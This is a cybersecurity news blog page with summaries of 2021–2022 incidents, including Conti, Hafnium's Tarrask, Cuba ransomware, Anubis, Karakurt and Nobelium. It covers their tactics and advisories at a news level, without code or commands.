Search This Blog

Showing posts with label Hacking. Show all posts

Conti Ransomware Shuts Down and Rebrands Itself

 

The Conti ransomware group has effectively put a stop to their operation by shutting down its infrastructure and informing its team leaders that the brand no longer exists. Advanced Intel's Yelisey Boguslavskiy tweeted that the gang's internal infrastructure had been shut down.

The Tor admin panels that members used to conduct negotiations and post "news" on their data leak site are currently down, according to BleepingComputer. Despite the fact that the public-facing 'Conti News' data dump and the ransom negotiation website are still available. 

As per Bleeping Computer, "The agenda to conduct the attack on Costa Rica for the purpose of publicity instead of ransom was declared internally by the Conti leadership. Internal communications between group members suggested that the requested ransom payment was far below $1 million USD (despite unverified claims of the ransom being $10 million USD, followed by Conti’s own claims that the sum was $20 million USD)". 

Despite the fact that the Conti ransomware brand has been retired, the cybercrime organisation will continue to play a significant role in the ransomware industry for some time. Rather than rebranding as another large ransomware organisation, Conti leadership has collaborated with other minor ransomware gangs to carry out attacks. 

Smaller ransomware gangs profit from this alliance because they have access to professional Conti pentesters, negotiators, and operators. The Conti cybercrime syndicate is able to expand its mobility and ability to dodge law enforcement more effectively by subdividing into smaller "cells" that are all monitored by the central leadership.

Conti has worked with a wide range of well-known ransomware operations, according to a study published by Advanced Intel. Conti's current members, which include negotiators, intelligence analysts, pentesters, and coders, are scattered throughout several ransomware operations. Despite the fact that they will now employ the same encryptors and negotiation sites as the other ransomware operation, they remain part of the larger Conti criminal group.

Anonymous Hacks Russian Energy Companies, Leaking 1Million+ Emails

 

Anonymous claims to have hacked into Russian energy businesses in order to expose emails and continue its cyberwar on Ukraine. On Twitter, the hacker collective claimed to have exposed over 1 million emails from ALET, a Russian customs broker for gasoline and energy firms. 

The tweet stated, "NEW: #Anonymous hacked nearly 1.1 million emails (1.1 TB of data) from ALET, a Russian customs broker for companies in the fuel and energy industries, handling exports and customs declarations for coal, crude oil, liquefied gases and petroleum products."

DDoSecrets, an organisation co-founded by Emma Best and dedicated to comprehensive data transparency in the public interest, disclosed the breach. 

What is ALET? 

ALET is a customs broker based in Russia. It manages exports and customs declarations for petroleum products, coal, liquefied gases, and crude oil for enterprises in the fuel and energy industry. It has worked with 400 businesses and filed 119,000 customs declarations since 2011 with oil products accounting for the majority of its revenues. Gazprom, Gazprom Neft, and Bashneft have all recommended it.

Anonymous has threatened to fight a cyberwar against Putin since the start of the Russia-Ukraine conflict. So far, it has lived up to that promise. Not only has the organisation disclosed Russian information, but it has also infiltrated Russian organisations in order to inform citizens about what is happening outside the nation. 

Anonymous is best known for hacking Russian streaming sites and TV networks in order to show Russian residents what was going on in Ukraine. Last week, the group hacked Enerpred, Russia's largest hydraulic equipment manufacturer dealing in the energy, coal, gas, oil, and construction industries, and stole 645,000 emails (up to 432GB of data).

The company's headquarters are in Irkutsk, Eastern Siberia's capital, and offices in major Russian cities including Moscow and St. Petersburg. DDoSecrets' (Distributed Denial of Secrets) website has the leaked data.

All Organisations Must Report Cybersecurity Beaches Within 6 Hours: CERT-In

 

CERT-In, India's computer, and emergency response team released new guidelines on Thursday that mandate that service providers, intermediaries, data centres, and government institutions disclose cybersecurity incidents, including data breaches, within six hours.

The government said in a release, "Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents."

Compromise of critical systems, targeting scanning, unauthorised access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances such as routers and IoT devices are among the types of incidents covered.

The government stated  it was taking these steps to ensure that the required indicators of compromise (IoC) associated with security events are easily accessible to "carry out the analysis, investigation, and coordination as per the process of the law”

Concerned organisations are also required to synchronise ICT system clocks to the National Informatics Centre (NIC) or National Physical Laboratory (NPL) Network Time Protocol (NTP) Server, maintain ICT system logs for a rolling period of 180 days, and necessitate VPN service providers to maintain data such as names, addresses, phone numbers, emails, and IP addresses of subscribers for a minimum of five years, according to the guidelines.

The guidelines also require virtual asset service, exchange, and custodian wallet providers to preserve records on Know Your Customer (KYC) and financial transactions for a period of five years, starting in 60 days.

India's Ministry of Electronics and Information Technology (MeitY) said in a statement, "These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country."

This New Malware Uses Windows Bugs to Conceal Scheduled Tasks

 

Microsoft has found a new malware employed by the Chinese-backed Hafnium hacking group to create and hide scheduled activities on compromised Windows PCs in order to sustain persistence. 

Cyberespionage attacks by the Hafnium threat group have previously targeted US defence businesses, think tanks, and researchers. It's also one of the state-sponsored groups Microsoft has tied to the global exploitation of the ProxyLogon zero-day vulnerability, which affected all supported Microsoft Exchange versions last year. 

The Microsoft Detection and Response Team (DART) stated, "As Microsoft continues to track the high-priority state-sponsored threat actor HAFNIUM, new activity has been uncovered that leverages unpatched zero-day vulnerabilities as initial vectors. Further investigation reveals forensic artifacts of the usage of Impacket tooling for lateral movement and execution and the discovery of a defence evasion malware called Tarrask that creates 'hidden' scheduled tasks, and subsequent actions to remove the task attributes, to conceal the scheduled tasks from traditional means of identification." 

Tarrask, a hacking tool, hides them from "schtasks /query" and Task Scheduler by removing the related Security Descriptor registry value, which is a previously undiscovered Windows flaw. 

By re-establishing dropped connections to command-and-control (C2) infrastructure, the threat group was able to keep access to the infected devices even after reboots. While the Hafnium operators could have deleted all on-disk artefacts, including all registry keys and the XML file uploaded to the system folder, this would have destroyed persistence between restarts. 

The "hidden" tasks can only be discovered by performing a manual search of the Windows Registry for scheduled tasks that do not have an SD (security descriptor) Value in their Task Key. 

Admins can additionally check for important events associated to tasks "hidden" by Tarrask malware by enabling the Security.evtx and Microsoft-Windows-TaskScheduler/Operational.evtx logs. Microsoft also suggests setting logging for 'TaskOperational' in the Microsoft-Windows-TaskScheduler/Operational Task Scheduler log and keeping an eye on outbound connections from crucial Tier 0 and Tier 1 assets. 

DART added, "The threat actors in this campaign used hidden scheduled tasks to maintain access to critical assets exposed to the internet by regularly re-establishing outbound communications with C&C infrastructure. We recognize that scheduled tasks are an effective tool for adversaries to automate certain tasks while achieving persistence, which brings us to raising awareness about this oft-overlooked technique."

SolarWinds Alerted About Attacks Targeting Web Help Desk Instances

 

SolarWinds alerted customers about attacks on Web Help Desk (WHD) instances that were exposed to the Internet and recommended they remove those from publicly accessible infrastructure (likely to prevent the exploitation of a potential security flaw). WHD is a helpdesk ticketing and IT inventory management software for businesses that aim to automate ticketing and IT asset management operations. 

SolarWinds stated, "A SolarWinds customer reported an external attempted attack on their instance of Web Help Desk (WHD) 12.7.5. The customer's endpoint detection and response (EDR) system blocked the attack and alerted the customer to the issue. In an abundance of caution, SolarWinds recommends all Web Help Desk customers whose WHD implementation is externally facing to remove it from your public (internet-facing) infrastructure until we know more." 

Customers who are unable to remove WHD instances from servers that are accessible to the Internet should install EDR software and monitor them for attack attempts. SolarWinds hasn't been able to replicate the scenario, the business is working with the customer to analyse the report. 

A SolarWinds spokesperson told BleepingComputer, "We received a report from one customer about an attempted attack that was not successful. While we are investigating this matter, we have also alerted other customers about this potential issue out of an abundance of caution. At this point, we have no reason to believe other customers were impacted." 

Although SolarWinds did not specify what tools or tactics were utilised in the attack, there are at least four security flaws that an attacker may use to target t an unpatched WHD instance: 
• Access Restriction Bypass Via Referrer Spoof - Business Logic Bypass Vulnerability (CVE-2021-32076) - Fixed in WHD 12.7.6 
• Enabled HTTP PUT & DELETE Methods (CVE-2021-35243) - Fixed in WHD 12.7.7 Hotfix 1 
• Hard-coded credentials allowing arbitrary HSQL queries execution (CVE-2021-35232) - Fixed in WHD 12.7.7 Hotfix 1 
• Sensitive Data Disclosure Vulnerability (CVE-2021-35251) - Fixed in WHD 12.7.8 

According to the CVE-2021-35251 advisory, attackers might use unsecured WHD instances to gain access to environmental details about the Web Help Desk installation, making the other three security flaws easier to exploit.

Wightlink Customers' Details Compromised in Cyber Attack

 

Wightlink, a UK ferry company, has been struck by a highly complex cyber-attack that may have exposed the personal information of "a small number of customers and staff." Wightlink stated, the incident, which occurred in February, reportedly impacted certain back-office IT systems but not its ferry services, booking system, and website.

According to the company, law enforcement and the UK's Information Commissioner's Office (ICO) have been contacted, since they have possible breach victims. Wightlink has three routes between Hampshire in southeast England and the Isle of Wight, an island off the south coast. The company claims to carry 4.6 million passengers each year on over 100 daily sailings.

Wightlink claimed in a statement received by The Daily Swig: “Unfortunately, despite Wightlink taking appropriate security measures, some of its back-office IT systems were affected by a cyber-attack last month. However, this criminal action has not affected Wightlink’s ferries and FastCats, which have continued to operate normally during and following the attack, nor were its booking system and website affected.” 

Wightlink said it hired third-party cybersecurity experts to analyse and analyse the situation as soon as it was detected. The operator stated it was working with the South East Regional Organised Crime Unit in addition to reporting the incident to the ICO. 

The company stated, “Wightlink does not process or store payment card details for bookings. However, the investigation has identified a small number of customers and staff for whom other items of personal information may have been compromised during the incident. 

Wightlink chief executive Keith Greenfield stated, “I would like to thank all my colleagues at Wightlink who responded quickly ensuring that the impact to customers was minimised and that cross-Solent travel and bookings were unaffected.”

Cuba Ransomware Hacked Microsoft Exchange Servers

 

To get early access to business networks and encrypt devices, the Cuba ransomware campaign is exploiting Microsoft Exchange vulnerabilities. The ransomware group is known as UNC2596, and the ransomware itself is known as COLDDRAW, according to cybersecurity firm Mandiant. 

Cuba is the most popular name for malware. Cuba is a ransomware campaign that began in late 2019, and while it started slowly, it gained traction in 2020 and 2021. In December 2021, the FBI issued a Cuba ransomware notice, stating that the group has infiltrated 49 critical infrastructure firms in the United States. Researchers indicate that the Cuba operation predominantly targets the United States, followed by Canada, according to a new analysis by Mandiant. Since August 2021, the Cuba ransomware gang has been using Microsoft Exchange vulnerabilities to launch web shells, RATs, and backdoors to gain a foothold on the target network. 

"Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as another access point leveraged by UNC2596 likely as early as August 2021," explains Mandiant in a new report. 

Cobalt Strike or the NetSupport Manager remote access tool is among the backdoors planted, although the organisation also utilises their own 'Bughatch', 'Wedgecut', 'eck.exe', as well as Burntcigar' tools. 
  • Wedgecut comes in the form of an executable named “check.exe,” which is a reconnaissance tool that enumerates the Active Directory through PowerShell.
  • Bughatch is a downloader that fetches PowerShell scripts and files from the C&C server. To evade detection, it loads in memory from a remote URL.
  • Burntcigar is a utility that can terminate processes at the kernel level by exploiting a flaw in an Avast driver, which is included with the tool for a “bring your own vulnerable driver” attack.
Finally, Termite is a memory-only dropper that downloads and loads the payloads mentioned earlier. However, this tool has been seen in campaigns by a variety of threat groups, indicating that it is not exclusively utilised by Cuba threat actors. 

Threat actors use stolen account credentials obtained with the widely available Mimikatz and Wicker tools to elevate access. They then use Wedgecut to undertake network reconnaissance before using RDP, SMB, PsExec, and Cobalt Strike to move laterally. Bughatch is then loaded by Termite, followed by Burntcigar, which disables security tools and creates the foundation for data exfiltration and file encryption. For the exfiltration process, the Cuba gang does not use cloud services, instead transfers everything to its own private infrastructure. 

Changing Operations 

Cuba ransomware teamed up with spammers behind the Hancitor malware in May 2021 to get access to corporate networks via DocuSign phishing emails. Since then, Cuba's operations have shifted to focus on vulnerabilities in public-facing services, such as the Microsoft Exchange ProxyShell and ProxyLogon flaws. Because security updates to fix the exploited vulnerabilities have been available for months, this move makes the assaults more potent but also easier to prevent. 

Once there are no more valuable targets running unpatched Microsoft Exchange servers, the Cuba operation will likely shift its focus to other vulnerabilities. This means that adopting accessible security updates as soon as they are released by software providers is critical in maintaining a strong security posture against even the most sophisticated threat actors.

UK Foreign Office Suffered ‘Serious Cyber Security Incident’

 

A "serious incident" compelled the Foreign Office of the United Kingdom to seek immediate cybersecurity assistance. A recently released public tender document confirmed the incident. According to a document released on February 4, the Foreign, Commonwealth and Development Office (FCDO) sought "urgent business support" from its cybersecurity contractor, BAE Applied Intelligence, 

The FCDO paid the company £467,325.60 — about $630,000 — for its services after issuing a contract for "business analyst and technical architect support to assess an authority cyber security incident" on January 12, 2022, according to the notice. However, the incident's facts, which had not previously been made public, remain unknown. 

The document stated, “The Authority was the target of a serious cyber security incident, details of which cannot be disclosed. In response to this incident, urgent support was required to support remediation and investigation. Due to the urgency and criticality of the work, the Authority was unable to comply with the time limits for the open or restricted procedures or competitive procedures with negotiation.” 

The Stack was the first to report on the BAE contract. According to an FCDO's spokesperson who did not give their name stated that the office does not comment on security but has measures in place to detect and protect against potential cyber events. Further queries about the incident, such as whether classified information was accessed, were declined by the spokesperson. 

TechCrunch also contacted the United Kingdom's data protection authority to see if the event had been reported, but is yet to hear back. The announcement of the apparent incident came only days after the British Council, an institution that specialises in international cultural and educational opportunities, was found to have suffered a severe security breach. Clario researchers discovered 144,000 unencrypted files on an unsecured Microsoft Azure storage server, including the personal and login information of British Council students. 

Following an investigation by the UK's National Cyber Security Center, Wilton Park, a Sussex-based executive agency of the FCDO, was hit by a cyberattack in December 2020, which revealed that hackers had access to the agency's systems for six years, though there was no proof that data had been stolen.

Over 40 Billion Records Exposed in 2021

 

According to Tenable's analysis of 1,825, breach data incidents publicized between November 2020 and October 2021, at least 40,417,167,937 records were exposed globally in 2021. This is risen from 730 publicly announced incidents with just over 22 billion data exposed over the same period in 2020. 

Organizations can efficiently prioritize security operations to stop attack paths and protect key systems and assets by studying threat actor behavior. Many of the events investigated for this research can be easily mitigated by fixing legacy flaws and fixing misconfigurations, which can help limit attack routes. 

In 2021, ransomware had a huge impact on businesses, accounting for about a 38% of all data breaches.  and unsecured cloud databases were responsible for 6% of all breaches. SSL VPNs that haven't been patched remain an ideal entry point for cyberespionage, exfiltrating sensitive and proprietary data, and encrypting networks. 

Threat groups, particularly ransomware, have been progressively exploiting Active Directory flaws and misconfigurations. When security controls and code audits are not in place, software libraries and network stacks that are frequently utilized among OT devices might create additional threats. 

Cyberespionage operations used the software supply chain to acquire sensitive data, whereas ransomware groups preferred physical supply chain disruption as a technique to extract payment. Data breaches wreaked havoc on the healthcare and education sectors the most. 

Claire Tills, Senior Research Engineer, Tenable stated, “Migration to cloud platforms, reliance on managed service providers, software and infrastructure as a service have all changed how organizations must think about and secure the perimeter.”  

“Modern security leaders and practitioners must think more holistically about the attack paths that exist within their networks and how they can efficiently disrupt them. By examining threat actor behaviour we can understand which attack paths are the most fruitful and leverage these insights to define an effective security strategy. ” 

Fixing assets is difficult enough given the sheer frequency of vulnerabilities revealed, but in 2021 it became much harder due to partial patches, vendor miscommunications, and patch bypasses. 

There were 21,957 common vulnerabilities and exposures (CVEs) reported in 2021, up 19.6% from 18,358 in 2020 and 241% more than the 6,447 declared in 2016. The number of CVEs increased at an average yearly percentage growth rate of 28.3 percent from 2016 to 2021.

$50 Million Lost to Fraudsters Impersonating as Broker-Dealers

 

A California man admitted his involvement in a large-scale and long-running Internet-based fraud scam that allowed him and other fraudsters to drain about $50 million from hundreds of investors.

Between 2012 and October 2020 Allen Giltman, 56, and his co-conspirators constructed phoney websites to collect money from people via the internet by advertising various investment opportunities (mainly the purchase of certificates of deposit). 

According to court documents, "The Fraudulent Websites advertised higher than average rates of return on the CDs, which enhanced the attractiveness of the investment opportunities to potential victims. At times, the fraudulent websites were designed to closely resemble websites being operated by actual, well-known, and publicly reputable financial institutions; at other times, the fraudulent websites were designed to resemble legitimate-seeming financial institutions that did not exist." 

They advertised the phoney investment sites in Google and Microsoft Bing search results for phrases like "best CD rates" and "highest cd rates." The scammers pretended to be FINRA broker-dealers in interactions with victims seeking investment possibilities, claiming to be employed by the financial companies they imitated on the scam sites. 

They employed virtual private networks (VPNs), prepaid gift cards to register web domains, prepaid phones, and encrypted applications to interact with their targets, and false invoices to explain the huge wire transfers they obtained from their victims to mask their genuine identities during their fraud schemes. 

"To date, law enforcement has identified at least 150 fraudulent websites created as part of the scheme," the Justice Department stated. 

"At least 70 victims of the fraud scheme nationwide, including in New Jersey, collectively transmitted approximately $50 million that they believed to be investments." 

The charge of wire fraud conspiracy, which Giltman consented, carries a possible sentence of 20 years in jail, while the charge of securities fraud carries a maximum sentence of five years in prison. Both are punishable by fines of $250,000 or double the gross gain or loss from the offence, whichever is greater. Giltman is scheduled to be sentenced on May 10, 2022. 

Stay Vigilant

The FBI's Criminal Investigative Division and the Securities and Exchange Commission cautioned investors in July 2021 that scammers posing as registered financial professionals such as brokers and investment advisers were posing as them. 

The July alert came after FINRA issued a similar fraud alert the same week regarding broker imposter frauds involving phishing sites that impersonate brokers and faked SEC or FINRA registration documents. 

"Fraudsters may falsely claim to be registered with the Securities and Exchange Commission (SEC), the Financial Industry Regulatory Authority (FINRA) or a state securities regulator in order to lure investors into scams, or even impersonate real investment professionals who actually are registered with these organizations," the FBI and SEC stated. 

Investors should first use the Investor.gov search engine to see if people marketing investment possibilities are licensed or registered, and then ensure they're not scammers by contacting the seller using independently confirmed contact information from the firm's Client Relationship Summary (Form CRS).

Researcher Detects 70 Web Cache Poisoning Vulnerabilities, Gets $40k in bug bounty rewards

 

Despite the fact that it is a well-known and well-documented vulnerability, 'web cache poisoning' continues to be a concern on the internet. 

Security researcher Iustin Ladunca (Youstin) recently uncovered 70 cache poisoning vulnerabilities with varying implications after conducting a thorough investigation on different websites, including some high-traffic online services. 

The intermediate storage points between web servers and client devices, such as point-of-presence servers, proxies, and load balancers, are the targets of web cache poisoning attacks. These intermediates aid website speed by keeping local versions of online content and delivering them to web clients faster. Cache poisoning attacks change the way cache servers behave and respond to certain URL requests from clients. 

Ladunca told The Daily Swigg, “I started researching web cache poisoning back in November 2020, shortly after reading James Kettle’s extensive research on the topic. Only a few weeks in, I discovered two novel cache poisoning vulnerabilities, which made me realize just how wide the attack surface for cache poisoning is.” 

Ladunca outlined how he identified and disclosed the web cache vulnerabilities, which included severs such as Apache Traffic Server, GitHub, GitLab, HackerOne, and Cloudflare, among others, in a blog post. 

“A common pattern was caching servers configured to only cache static files, meaning attacks were limited to static files only,” Ladunca stated.

“Even so, there still was a significant impact, since modern websites rely heavily on JS [JavaScript] and CSS {cascading style sheets] and taking those files down would really affect application availability.” 

Denial of service (DoS) attacks were launched as a result of several web cache vulnerabilities. Some headers are used as keys by cache servers to store and retrieve URL requests. Ladunca was able to compel servers to cache error responses and deliver them instead of the original content by utilising faulty values in unkeyed headers, making the target URLs unreachable to clients. 

“In terms of techniques used, by far the most common one was CP-DoS through unkeyed headers, which probably accounted for 80% of [the] total findings,” Ladunca said. 

Cross-site scripting (XSS) attacks could be exploited by other web cache poisoning flaws. One vulnerability, for example, may cause the cache server to forward JavaScript file requests to an attacker-controlled IP. Ladunca was also able to reroute a cache request from one host to another that was vulnerable to DOM-based XSS attacks in another case. 

For the 70 web cache vulnerabilities he uncovered, Ladunca received a bug bounty of roughly $40,000. He did, however, learn some valuable lessons about safeguarding web cache servers. 

“I would say a good way to secure CDNs from cache poisoning attacks would be disabling caching for error status codes, a mitigation which should stop a large part of CP-DoS attacks,” he said. 

The researcher also suggested utilizing PortSwigger's Param Miner, an open-source tool for locating hidden, unrelated parameters. Param Miner can help detect unkeyed headers that can be used for web cache poisoning by running it against web apps.

Anubis Trojan Targeted 400 Banks’ Customers

 

A malicious app disguised as the official account management portal for French telecom giant Orange S.A. is targeting customers of Chase, Wells Fargo, Bank of America, and Capital One, as well as almost 400 other financial institutions. 

According to researchers, this is only the beginning. Researchers at Lookout cautioned in a recent report that once downloaded, the malware - a version of banking trojan Anubis – collects the user's personal data and uses it to mislead them. And it's not just huge bank customers that are at risk, according to the researchers: Crypto wallets and virtual payment networks are also being targeted.

The Lookout report stated, “As a banking trojan malware, Anubis’ goal is to collect significant data about the victim from their mobile device for financial gain.”

“This is done by intercepting SMSs, keylogging, file exfiltration, screen monitoring, GPS data collection, and abuse of the device’s accessibility services.” 

The malicious version of the Orange Telecom account management software was uploaded to the Google Play store in July 2021 and then removed, but analysts believe this was only a test of Google's antivirus defences and that it could reappear shortly. 

The report added, “We found that obfuscation efforts were only partially implemented within the app and that there were additional developments still occurring with its command-and-control (C2) server. We expect more heavily obfuscated distributions will be submitted in the future.” 

New Anubis Tricks 

The malicious version of the Orange Telecom account management software was uploaded to the Google Play store in July 2021 and then removed, but analysts believe this was only a test of Google's antivirus defences and that it could reappear shortly. 

The banking trojan connects to the command-and-control (C2) server after being downloaded on the device and downloads another application to start the SOCKS5 proxy. 

“This proxy allows the attacker to enforce authentication for clients communicating with their server and mask communications between the client and C2. Once retrieved and decrypted, the APK is saved as ‘FR.apk’ in ‘/data/data/fr.orange.serviceapp/app_apk,'” the researchers stated.

The user is then prompted to disable Google Play Protect, giving the attacker complete control, according to the research. Banks, reloadable card businesses, and cryptocurrency wallets are among the 394 apps targeted by fr.orange.serviceapp, according to the researchers. 

The Anubis client was linked back to a half-completed crypto trading platform, according to the Lookout team. 

Anubis, which was first discovered in 2016, is freely available as open-source code on underground forums, along with instructions for budding banking trojan criminals, according to the research. 

According to Lookout, the basic banking trojan has added a credential stealer to the mix in this current edition of Anubis code, putting logins for cloud-based platforms like Microsoft 365 in danger. 

As per Kristina Balaam, a security researcher with Lookout, the Lookout team was unable to discover any successful attacks linked to the Orange S.A. campaign. 

“While we can’t be certain whether the app has been used in a successful attack, we do know they are targeting U.S. banks including Bank of America, U.S. Bank, Capital One, Chase, SunTrust and Wells Fargo,” Balaam stated.

A flaw in Anti Cheating Browser Extension led Hackers to Hack University Computers

 

A web security vulnerability in an anti-cheating browser extension developed a way to sneak into the machines of college students as well as other users before they could be fixed. 

Security researchers at Sector 7, the research section of Dutch security firm Computest, identified a cross-site scripting (XSS) bug in the Proctorio Google Chrome browser plugin. Proctorio is a type of proctoring software, which has come into its own during the pandemic to prevent cheating throughout online assessments. 

The technology has been widely employed in the Netherlands, much to the ire of local student organizations that have unsuccessfully challenged its use as a privacy danger. Concerns were raised because the program may read and update data on websites visited by users, as well as take screenshots and monitor webcam footage. 

“This [vulnerability] could be used by a malicious page to access data on any site where the user is currently logged in, for example, read all your email,” Sector7 told The Daily Swig. 

“And it could be used to access features like the webcam if the user has granted any website permission to use it.” 

According to a professional write-up of the flaw by Sector7, the problem came through errors in the Proctorio extension's implementation of an 'open calculator' functionality. Since the calculator is attached to the DOM of the page activating Proctorio, JavaScript on the page can immediately enter an expression for the calculator and afterward activate the evaluation, according to the researchers. 

This enables the website to run code within the content script. The page can then send messages to the background website from the scope of the content script, which is regarded as messages from the content script. Researchers discovered that they could trigger uXSS using a mixture of messages. 

Sector7 told The Daily Swig: “[The] root cause [of the vulnerability] was evaluating untrusted JavaScript originating from a webpage in the extension, leading to universal cross-site scripting.” 

Nevertheless, Proctorio has finally corrected the critical security flaw. As Chrome browser extensions are updated automatically, users do not have to actively upgrade their software to be secured. 

Sector7 reported the problem to Proctorio in June, and a week later received confirmation that it had been rectified. Sector7 verified the fix in August, well before it revealed its technical findings last week. Sector7/Computest investigated the Proctorio program at the demand of local media outlet RTL Nieuws, which afterward compiled a report on the findings.

US Cyber Command Together with NSA and FBI has Started Taking Direct Action Against International Ransomware Gangs

 

General Paul M. Nakasone, the commander of US Cyber Command, stated at the latest national security incident that the organization has commenced taking direct action targeting multinational ransomware organizations as part of a much bigger campaign to reduce attacks on American businesses and infrastructures. 

During his speech at the Reagan National Defense Forum, a gathering of national security experts conducted on Saturday, the General highlighted that the department is working in conjunction with the NSA, FBI, and other federal organizations. 

Following the event, he told The New York Times that Cyber Command's current aim is to "understand the adversary and their insights better than we've ever understood them before." 

The nation's cyberspace defense authorities began a campaign targetting ransomware threats from organized criminal rings around nine months ago, long before high-profile cases such as the Colonial Pipeline closure demonstrated how badly ransomware assaults might impair national and international infrastructure. 

Whereas the General was tight-lipped about the specifics of currently underway and former counter-operations, prior reports indicated that Cyber Command was involved in both punitive actions, including those targeting Russian ransomware group REevil, and restoration efforts, such as those implemented by federal agencies following the Colonial Pipeline mishap. The latter resulted in the DOJ seizing and recovering the "majority" of the ransom paid to the DarkSide ransomware group. 

All such efforts are part of a greater effort called for by a presidential executive order signed in May of this year. The 2021 legislation mandated a broad governmental transition to security measures such as mandatory two-factor authentication, zero-trust principles, and the establishment of a new Cybersecurity Safety Review Board. 

At a recent presentation, the Chief of Cyber Command emphasized the need for "speed, agility, and unity of effort". He stated that all these three criteria were critical in confronting threats, regardless of whether they originated from nation-states, proxies, or independent criminal organizations. In the future, Nakasone hopes to see a federal push for a "whole-of-government effort." 

Diplomatic outreach activities, as well as an extended and globalized focus on defending critical infrastructure resources, are seen as critical steps towards saving the nation from ransomware cyberattacks as well as other cyber invasions, according to the General.

‘Karakurt’ Extortion Back with an Upswing

 

As of late, a new money-driven attack group has been on the upswing, and unlike previous groups, it does not appear to be interested in spreading ransomware or attacking high-profile targets. 

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish, and is also the name of a deadly spider prevalent in eastern Europe and Siberia. 

Karakurt specializes in data exfiltration and eventual extortion, which allows them to operate swiftly. It already has claimed the lives of more than 40 people until September, with 95 percent of them in North America and the rest in Europe, according to a paper released on Friday by academics. 

Experts suggest Karakurt would be a trend-setter, and shortly, similar groups may shift away from attacking large corporations or critical-infrastructure providers with ransomware and instead take a similar exfiltration/extortion technique. 

“The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” read the report.

According to Accenture CIFR researchers, Karakurt was originally spotted by investigators outside of Accenture Security in June since it started building up its network and data-leak platforms. In August, the group registered the domains karakurt.group and karakurt.tech, as well as the Twitter, handle @karakurtlair. Shortly the organization launched its first successful attack. 

Accenture Security's collecting sources and intrusion research discovered the organization's first target in September; two months later, the group revealed their victim on the karakurt.group website.

Karakurt's tactics, techniques, and procedures (TTP) for infiltrating victim infrastructures, accomplishing persistence, relocating laterally, and stealing data are similar to those used by numerous threat actors and the group frequently takes a "living off the land" strategy relying on the attack surface, i.e., utilizing tools or features which already belong across the targeted system. 

Karakurt primarily employs service installation, remote-management software, and the delivery of command-and-control (C2) beacons throughout victim environments via Cobalt Strike to sustain persistence once connected to a network. 

However, experts have noticed that the group recently appears to have changed methods in its implementation of backup persistence. Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices" rather than delivering Cobalt Strike, they stated. This enables the gang to migrate laterally by leveraging previously obtained user, service, and administrator personal information. 

Researchers stated the gang will also employ additional remote-management technologies, such as remote desktop protocol (RDP), Cobalt Strike, and PowerShell commands, to travel laterally and uncover relevant data to steal and exploit for extortion reasons as needed. 

Nevertheless, the group's assault pattern thus far demonstrates that it is adaptable enough to change its techniques based on the victim's circumstances. Karakurt can also avoid detection in many circumstances since it frequently utilizes authorized credentials to access websites. 

Ultimately, Karakurt employs 7zip and WinZip for data compression, along with Rclone or FileZilla (SFTP) for staging and final exfiltration to Mega.io cloud storage, to steal information. Also according to Accenture Security, the staging folders utilized to exfiltrate data in assaults were C:Perflogs and C:Recovery. 

Researchers offered standard mitigation recommendations to enterprises to prevent being penetrated and extorted by Karakurt, which will call them several times to put pressure over them to pay once their data has been stolen.

Nobelium Hacking Group Targets French Organisations

 

According to the French national cyber-security agency ANSSI, the Russian-backed Nobelium hacker group responsible for last year's SolarWinds hack has now been targeting French firms since February 2021. 

Whereas the ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information) has not identified how Nobelium gained access to email accounts belonging to French organizations, it has stated that the hackers exploited them to send hostile emails to international entities.

In turn, French government organizations were targeted by fraudulent emails sent from servers belonging to foreign firms, which were thought to be infiltrated by the very same threat actor. Nobelium's infrastructure for cyberattacks on French entities was primarily built utilizing virtual private servers (VPS) from several hosting companies (favoring servers from OVH and located close to the targeted countries). 

"Overlaps have been identified in the tactics, techniques, and procedures (TTP) between the phishing campaigns monitored by ANSSI and the SOLARWINDS supply chain attack in 2020," ANSSI explained in a report. 

ANSSI advises limiting the processing of email attachments to prohibit harmful files provided in phishing efforts to fight against this hacker group's attacks. 

The French cyber-security agency additionally urges at-risk enterprises to use its Active Directory security hardening guidance to improve Active Directory security (and AD servers in particular). 

Nobelium, the hacker squad responsible for last year's SolarWinds supply-chain attack, which resulted in the compromise of various US federal agencies, is the cyber department of the Russian Foreign Intelligence Service (SVR), also known as APT29, The Dukes, or Cozy Bear. 

In April, the US government charged the SVR section of organizing the "broad-scope cyber-espionage campaign" that targeted SolarWinds. 

Based on strategies identified in events beginning in 2018, cybersecurity firm Volexity also attributed the assaults to the same threat actor. 

The Microsoft Threat Intelligence Center (MSTIC) revealed information in May on a Nobelium phishing effort that targeted government agencies from 24 countries. 

Nobelium is still targeting the worldwide IT supply chain, according to Microsoft, having hit 140 managed service providers (MSPs) and cloud service providers and compromised at least 14 since May 2021. 

Nobelium also attacked Active Directory Federation Services (AD FS) servers, seeking to infiltrate governments, think tanks, and private companies in the United States and Europe with the use of FoggyWeb, a new inactive and highly targeted backdoor. 

In October, Microsoft disclosed that Nobelium was perhaps the most prominent Russian hacking organization throughout July 2020 and June 2021, orchestrating the attacks that were behind 92 % of the notifications Microsoft sent to customers about Russia-based threat activity. 

Mandiant too linked the hacking organization to attempts to compromise government and enterprise networks throughout the world by targeting their MSPs with a new backdoor codenamed Ceeloader, which is designed to deliver more malware and capture sensitive information of political importance to Russia.

Norton Research Shows That Almost 42% of UK Gamers Have Encountered Cyber-Attack

 

Regardless of whether casual or diehard, gamers polled in the UK said that they would rather spend their time playing video games than attending a sporting event or concert (72%), going on a date (72%), or reading a book (68 % ). 

The 2021 Norton Cyber Safety Insights Report: Special Release – Gaming & Cybercrime, undertaken by The Harris Poll among more than 700 UK adults who as of now play online games, discovered that even more than two in five UK gamers (42 percent) have encountered a cyberattack on their gaming account or gadget. Nearly four in five (78 percent) of the those polled say they have been monetarily impacted as a direct consequence, losing an average of £145. 

